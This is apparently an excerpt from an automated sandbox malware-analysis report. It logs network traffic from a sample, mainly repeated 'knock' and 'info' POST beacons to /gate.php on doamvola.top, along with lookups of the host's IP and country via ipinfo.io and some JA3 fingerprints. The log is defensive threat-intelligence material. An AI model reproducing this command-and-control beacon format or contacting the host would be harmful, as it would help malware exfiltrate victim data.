Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: Joe Sandbox ViewIP Address: 216.239.34.21 216.239.34.21
Source: Joe Sandbox ViewIP Address: 151.101.0.133 151.101.0.133
Source: Joe Sandbox ViewIP Address: 216.239.38.21 216.239.38.21
Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
